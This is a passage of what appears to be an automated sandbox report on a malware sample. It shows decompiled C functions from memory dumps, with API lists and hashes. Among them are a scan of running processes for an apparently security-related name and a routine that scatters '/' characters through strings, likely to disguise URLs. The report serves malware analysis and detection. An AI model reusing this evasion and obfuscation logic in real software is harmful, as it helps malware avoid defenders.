								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E04959242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                                                          0x049515ff
                                                          0x04951600
                                                          0x04951606
                                                          0x04951611
                                                          0x04951611
                                                          0x04951613
                                                          0x049518e7
                                                          0x049518ec
                                                          0x049518ee
                                                          0x049518f3
                                                          0x049518f4
                                                          0x049518f9
                                                          0x049518fa
                                                          0x04951905
                                                          0x04951936
                                                          0x0495193b
                                                          0x049519fe
                                                          0x04951941
                                                          0x04951948
                                                          0x04951950
                                                          0x049519fb
                                                          0x04951956
                                                          0x0495195b
                                                          0x04951960
                                                          0x04951965
                                                          0x049519ed
                                                          0x0495196b
                                                          0x0495196b
                                                          0x0495196d
                                                          0x04951973
                                                          0x04951974
                                                          0x04951974
                                                          0x04951977
                                                          0x0495197a
                                                          0x04951980
                                                          0x04951985
                                                          0x04951986
                                                          0x0495198b
                                                          0x0495198e
                                                          0x04951999
                                                          0x00000000
                                                          0x00000000
                                                          0x049519a1
                                                          0x049519a9
                                                          0x049519b5
                                                          0x049519b9
                                                          0x049519bb
                                                          0x049519c0
                                                          0x00000000
                                                          0x00000000
                                                          0x049519c0
                                                          0x049519b9
                                                          0x049519d2
                                                          0x049519d5
                                                          0x049519dc
                                                          0x049519e7
                                                          0x049519e7
                                                          0x00000000
                                                          0x049519c2
                                                          0x049519c2
                                                          0x049519c7
                                                          0x049519c9
                                                          0x049519ca
                                                          0x049519cd
                                                          0x00000000
                                                          0x049519cd
                                                          0x00000000
                                                          0x049519c7
                                                          0x04951974
                                                          0x049519ee
                                                          0x049519ee
                                                          0x049519f4
                                                          0x049519f4
                                                          0x04951950
                                                          0x04951907
                                                          0x0495190d
                                                          0x04951915
                                                          0x0495192e
                                                          0x04951930
                                                          0x00000000
                                                          0x00000000
                                                          0x04951917
                                                          0x04951921
                                                          0x04951925
                                                          0x0495192b
                                                          0x00000000
                                                          0x0495192b
                                                          0x04951925
                                                          0x04951915
                                                          0x04951a07
                                                          0x04951608
                                                          0x04951608
                                                          0x0495160f
                                                          0x0495161a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0495160f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 049518EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 04951907
                                                          • ResetEvent.KERNEL32(?), ref: 04951980
                                                          • GetLastError.KERNEL32 ref: 0495199B
                                                            • Part of subcall function 04959242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04959259
                                                            • Part of subcall function 04959242: SetEvent.KERNEL32(?), ref: 04959269
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: 16b3e40ed46c81fd5cc74f6bf131d7c0fe904c68b09e40b7eb4c3ea0d1df41f0
                                                          • Instruction ID: d09388a49f5485d2684fed814ec7d244fa8a1195b023067116e47fa6163e723b
                                                          • Opcode Fuzzy Hash: 16b3e40ed46c81fd5cc74f6bf131d7c0fe904c68b09e40b7eb4c3ea0d1df41f0
                                                          • Instruction Fuzzy Hash: 0441C432A00604ABDB21DFA5DC45BAEB7BDEF84364F300639E955D7160E630FD418B10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049511EE, Relevance: 6.1, APIs: 4, Instructions: 96synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E049511EE(signed int _a4, signed int* _a8) {
				void* __ecx;
				void* __edi;
				signed int _t6;
				intOrPtr _t8;
				intOrPtr _t12;
				short* _t19;
				void* _t25;
				signed int* _t28;
				CHAR* _t30;
				long _t31;
				intOrPtr* _t32;

				_t6 =  *0x495d270; // 0xd448b889
				_t32 = _a4;
				_a4 = _t6 ^ 0x109a6410;
				_t8 =  *0x495d2a8; // 0x47a5a8
				_t3 = _t8 + 0x495e87e; // 0x61636f4c
				_t25 = 0;
				_t30 = E049538A8(_t3, 1);
				if(_t30 != 0) {
					_t25 = CreateEventA(0x495d2ac, 1, 0, _t30);
					E0495A734(_t30);
				}
				_t12 =  *0x495d25c; // 0x4000000a
				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E0495A65C() != 0) {
					L12:
					_t28 = _a8;
					if(_t28 != 0) {
						 *_t28 =  *_t28 | 0x00000001;
					}
					_t31 = E04958EA1(_t32, 0);
					if(_t31 == 0 && _t25 != 0) {
						_t31 = WaitForSingleObject(_t25, 0x4e20);
					}
					if(_t28 != 0 && _t31 != 0) {
						 *_t28 =  *_t28 & 0xfffffffe;
					}
					goto L20;
				} else {
					_t19 =  *0x495d10c( *_t32, 0x20);
					if(_t19 != 0) {
						 *_t19 = 0;
						_t19 = _t19 + 2;
					}
					_t31 = E0495A273(0,  *_t32, _t19, 0);
					if(_t31 == 0) {
						if(_t25 == 0) {
							L22:
							return _t31;
						}
						_t31 = WaitForSingleObject(_t25, 0x4e20);
						if(_t31 == 0) {
							L20:
							if(_t25 != 0) {
								CloseHandle(_t25);
							}
							goto L22;
						}
					}
					goto L12;
				}
			}














                                                          0x049511ef
                                                          0x049511f6
                                                          0x04951200
                                                          0x04951204
                                                          0x0495120a
                                                          0x04951219
                                                          0x04951220
                                                          0x04951224
                                                          0x04951236
                                                          0x04951238
                                                          0x04951238
                                                          0x0495123d
                                                          0x04951244
                                                          0x0495129b
                                                          0x0495129b
                                                          0x049512a1
                                                          0x049512a3
                                                          0x049512a3
                                                          0x049512ad
                                                          0x049512b1
                                                          0x049512c3
                                                          0x049512c3
                                                          0x049512c7
                                                          0x049512cd
                                                          0x049512cd
                                                          0x00000000
                                                          0x0495125d
                                                          0x04951262
                                                          0x0495126a
                                                          0x0495126e
                                                          0x04951272
                                                          0x04951272
                                                          0x0495127f
                                                          0x04951283
                                                          0x04951287
                                                          0x049512dc
                                                          0x049512e2
                                                          0x049512e2
                                                          0x04951295
                                                          0x04951299
                                                          0x049512d0
                                                          0x049512d2
                                                          0x049512d5
                                                          0x049512d5
                                                          0x00000000
                                                          0x049512d2
                                                          0x04951299
                                                          0x00000000
                                                          0x04951283

                                                          APIs
                                                            • Part of subcall function 049538A8: lstrlen.KERNEL32(00000005,00000000,63699BC3,00000027,00000000,04DD9A98,00000000,?,?,63699BC3,00000005,0495D00C,?,?,04955D30), ref: 049538DE
                                                            • Part of subcall function 049538A8: lstrcpy.KERNEL32(00000000,00000000), ref: 04953902
                                                            • Part of subcall function 049538A8: lstrcat.KERNEL32(00000000,00000000), ref: 0495390A
                                                          • CreateEventA.KERNEL32(0495D2AC,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04953760,?,00000001,?), ref: 0495122F
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,04953760,00000000,00000000,?,00000000,?,04953760,?,00000001,?,?,?,?,049552AA), ref: 0495128F
                                                          • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04953760,?,00000001,?), ref: 049512BD
                                                          • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04953760,?,00000001,?,?,?,?,049552AA), ref: 049512D5
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 73268831-0
                                                          • Opcode ID: a1c33002dddc3a3035a3236ac90b879a76dea5da13e5505f5bad36a82cae2dca
                                                          • Instruction ID: 21f1bc3c7e14ddbb7a4cf3aa0db15fa41cef3ef8182a5e4bebb52bac3ee38603
                                                          • Opcode Fuzzy Hash: a1c33002dddc3a3035a3236ac90b879a76dea5da13e5505f5bad36a82cae2dca
                                                          • Instruction Fuzzy Hash: 2C21F232E003006BDB21EA68AC89B6B77ADFB89750B750635FD05D7120DB64E8418784
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04959242, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E04959242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x495d13c; // 0x495abf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E0495A71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E0495A734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E04955646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                          0x04959242
                                                          0x04959242
                                                          0x0495924c
                                                          0x04959252
                                                          0x04959255
                                                          0x04959259
                                                          0x0495925f
                                                          0x04959264
                                                          0x0495927d
                                                          0x04959280
                                                          0x04959284
                                                          0x04959288
                                                          0x04959289
                                                          0x0495928e
                                                          0x04959291
                                                          0x04959298
                                                          0x0495929f
                                                          0x049592f2
                                                          0x049592f8
                                                          0x049592fe
                                                          0x04959339
                                                          0x0495933f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x049592fe
                                                          0x049592a5
                                                          0x00000000
                                                          0x049592ac
                                                          0x049592ba
                                                          0x049592bd
                                                          0x049592c0
                                                          0x049592cc
                                                          0x049592d0
                                                          0x04959332
                                                          0x049592d2
                                                          0x049592d5
                                                          0x049592d9
                                                          0x049592da
                                                          0x049592db
                                                          0x049592dd
                                                          0x049592e4
                                                          0x04959322
                                                          0x0495932d
                                                          0x049592e6
                                                          0x049592e9
                                                          0x049592ed
                                                          0x049592ed
                                                          0x049592e4
                                                          0x00000000
                                                          0x049592d0
                                                          0x049592a5
                                                          0x04959269
                                                          0x0495926f
                                                          0x04959272
                                                          0x04959277
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04959307
                                                          0x0495930f
                                                          0x04959314
                                                          0x04959317
                                                          0x00000000

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 04959259
                                                          • SetEvent.KERNEL32(?), ref: 04959269
                                                          • GetLastError.KERNEL32 ref: 049592F2
                                                            • Part of subcall function 04955646: WaitForMultipleObjects.KERNEL32(00000002,0495A8E3,00000000,0495A8E3,?,?,?,0495A8E3,0000EA60), ref: 04955661
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          • GetLastError.KERNEL32(00000000), ref: 04959327
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 648b233eb080983d4e4028f24f52f4aeb346ede113daf46328cd02014b440e40
                                                          • Instruction ID: 944a9c64ae43a36a4266f74986052a5c2d0269536a33dad9935e64d6061d04ef
                                                          • Opcode Fuzzy Hash: 648b233eb080983d4e4028f24f52f4aeb346ede113daf46328cd02014b440e40
                                                          • Instruction Fuzzy Hash: B931EEB5900309EFEB21DFA5D8C499EBBBCEB08344F20497AE942E6161D734AA45DF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049536B1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E049536B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E04953BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E04954F79(_t23);
						}
					}
					return _t38;
				}
				if(E0495A2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x495d2ac, 1, 0,  *0x495d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E0495A446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E0495853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E04954F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E049511EE( &_v32, _t39);
					goto L13;
				}
			}












                                                          0x049536b1
                                                          0x049536be
                                                          0x049536c4
                                                          0x049536c5
                                                          0x049536c6
                                                          0x049536c7
                                                          0x049536c8
                                                          0x049536cc
                                                          0x049536d8
                                                          0x049536dc
                                                          0x04953764
                                                          0x04953764
                                                          0x04953767
                                                          0x04953769
                                                          0x04953771
                                                          0x04953771
                                                          0x04953777
                                                          0x0495377a
                                                          0x0495377a
                                                          0x04953777
                                                          0x04953785
                                                          0x04953785
                                                          0x049536ef
                                                          0x049536f1
                                                          0x049536f1
                                                          0x04953708
                                                          0x0495370c
                                                          0x0495370f
                                                          0x0495371a
                                                          0x04953721
                                                          0x04953721
                                                          0x0495372a
                                                          0x0495372e
                                                          0x0495373c
                                                          0x04953730
                                                          0x04953730
                                                          0x04953731
                                                          0x04953732
                                                          0x04953733
                                                          0x04953734
                                                          0x04953735
                                                          0x04953735
                                                          0x04953741
                                                          0x04953744
                                                          0x04953748
                                                          0x0495374a
                                                          0x0495374a
                                                          0x04953751
                                                          0x00000000
                                                          0x04953753
                                                          0x04953753
                                                          0x04953760
                                                          0x00000000
                                                          0x04953760

                                                          APIs
                                                          • CreateEventA.KERNEL32(0495D2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,049552AA,?,00000001,?), ref: 04953702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,049552AA,?,00000001,?,00000002,?,?,04955D5E,?), ref: 0495370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,049552AA,?,00000001,?,00000002,?,?,04955D5E,?), ref: 0495371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,049552AA,?,00000001,?,00000002,?,?,04955D5E,?), ref: 04953721
                                                            • Part of subcall function 0495A446: WaitForSingleObject.KERNEL32(00000000,?,?,?,04953741,?,04953741,?,?,?,?,?,04953741,?), ref: 0495A520
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 63ff51b424306fa867e18cbd6da804a624373969118d3f8fe2fe8e116d056a7b
                                                          • Instruction ID: 5f1f54ba52e66e4d45c87d3cd8df23f5bfafbaa8d3a053061ea4e58b256dd5ba
                                                          • Opcode Fuzzy Hash: 63ff51b424306fa867e18cbd6da804a624373969118d3f8fe2fe8e116d056a7b
                                                          • Instruction Fuzzy Hash: BF2168B2D00315ABDF20FFE498858AEB7ADDB84394B254575EE11E7110D734B9458760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 049517E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E049517E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x495d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x495d250; // 0xac7a01ce
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x495d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x049517ed
                                                          0x049517f0
                                                          0x049517f6
                                                          0x0495180e
                                                          0x04951810
                                                          0x04951815
                                                          0x04951817
                                                          0x0495181a
                                                          0x0495181c
                                                          0x0495181f
                                                          0x04951821
                                                          0x04951821
                                                          0x04951823
                                                          0x0495182e
                                                          0x04951833
                                                          0x04951844
                                                          0x0495184c
                                                          0x04951851
                                                          0x04951854
                                                          0x04951857
                                                          0x04951859
                                                          0x0495185c
                                                          0x0495185f
                                                          0x0495185f
                                                          0x04951862
                                                          0x0495186d
                                                          0x04951872
                                                          0x0495187c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04951C49,00000000,?,?,049520C2,?,04DD95B0), ref: 049517F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04951808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,04951C49,00000000,?,?,049520C2,?,04DD95B0), ref: 0495184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 0495186D
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: 5102a73af2ffcb24d6d283df27eac2136594a6fb35fab0a8a1ad468192de55d2
                                                          • Instruction ID: 5dede0b5454bf83516ba272085e48bae708db4f814d5efc898b9b063ed8bd33e
                                                          • Opcode Fuzzy Hash: 5102a73af2ffcb24d6d283df27eac2136594a6fb35fab0a8a1ad468192de55d2
                                                          • Instruction Fuzzy Hash: 2B118672A04214AFD710CB69EC85E9EBFBEDBC4660B254276F904DB150E774AE0587A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495486F, Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E0495486F(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E0495A71F(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x495c284);
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x495c284);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}










                                                          0x0495487a
                                                          0x0495487e
                                                          0x04954880
                                                          0x04954881
                                                          0x04954889
                                                          0x04954889
                                                          0x0495488d
                                                          0x00000000
                                                          0x00000000
                                                          0x04954884
                                                          0x04954885
                                                          0x04954888
                                                          0x04954888
                                                          0x04954895
                                                          0x0495489a
                                                          0x049548a0
                                                          0x049548a8
                                                          0x049548ae
                                                          0x049548b0
                                                          0x049548b5
                                                          0x049548b9
                                                          0x049548bb
                                                          0x049548be
                                                          0x049548c5
                                                          0x049548c5
                                                          0x049548cf
                                                          0x049548d2
                                                          0x049548d3
                                                          0x049548d5
                                                          0x049548e1
                                                          0x049548e1
                                                          0x049548ee

                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,04DD95AC,?,04955D25,?,0495243F,04DD95AC,?,04955D25), ref: 04954889
                                                          • StrTrimA.SHLWAPI(?,0495C284,00000002,?,04955D25,?,0495243F,04DD95AC,?,04955D25), ref: 049548A8
                                                          • StrChrA.SHLWAPI(?,00000020,?,04955D25,?,0495243F,04DD95AC,?,04955D25), ref: 049548B3
                                                          • StrTrimA.SHLWAPI(00000001,0495C284,?,04955D25,?,0495243F,04DD95AC,?,04955D25), ref: 049548C5
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Trim
                                                          • String ID:
                                                          • API String ID: 3043112668-0
                                                          • Opcode ID: 6cd825c886683b13ac4a02162ceab49d2dc88348235a7864d6bb1a66be6d7d5f
                                                          • Instruction ID: 3a3b113d4bb4e46c1b2c4dee805931c291919f5286f1b02897538b485cd12574
                                                          • Opcode Fuzzy Hash: 6cd825c886683b13ac4a02162ceab49d2dc88348235a7864d6bb1a66be6d7d5f
                                                          • Instruction Fuzzy Hash: C201B5716053519BD221DE659C48F27BF9CEB85A64F310638FE41D7250EB60E80197E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0495A65C, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E0495A65C() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x495d2a8; // 0x47a5a8
						_t2 = _t9 + 0x495ee34; // 0x73617661
						_push( &_v264);
						if( *0x495d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                                          0x0495a667
                                                          0x0495a671
                                                          0x0495a675
                                                          0x0495a67f
                                                          0x0495a6b0
                                                          0x0495a686
                                                          0x0495a68b
                                                          0x0495a698
                                                          0x0495a6a1
                                                          0x0495a6b8
                                                          0x0495a6a3
                                                          0x0495a6ab
                                                          0x00000000
                                                          0x0495a6ab
                                                          0x0495a6b9
                                                          0x0495a6ba
                                                          0x00000000
                                                          0x0495a6ba
                                                          0x00000000
                                                          0x0495a6b4
                                                          0x0495a6c0
                                                          0x0495a6c5

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0495A66C
                                                          • Process32First.KERNEL32(00000000,?), ref: 0495A67F
                                                          • Process32Next.KERNEL32(00000000,?), ref: 0495A6AB
                                                          • CloseHandle.KERNEL32(00000000), ref: 0495A6BA
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                          • String ID:
                                                          • API String ID: 420147892-0
                                                          • Opcode ID: 8216eccf43fad03b5f3c7a3c160c53eedb31321a69eacc403a473d63dfa10de8
                                                          • Instruction ID: 12494022d3c68c9771999f27df8b9935a9fc07ff1ad0ba60ce8c15a6328b476d
                                                          • Opcode Fuzzy Hash: 8216eccf43fad03b5f3c7a3c160c53eedb31321a69eacc403a473d63dfa10de8
                                                          • Instruction Fuzzy Hash: EBF0BB366021196AE721FA769C49EDB7BACDBC5314F210371ED05C3110EA24EA8587A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04956840, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E04956840(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                          0x0495684a
                                                          0x0495684e
                                                          0x04956863
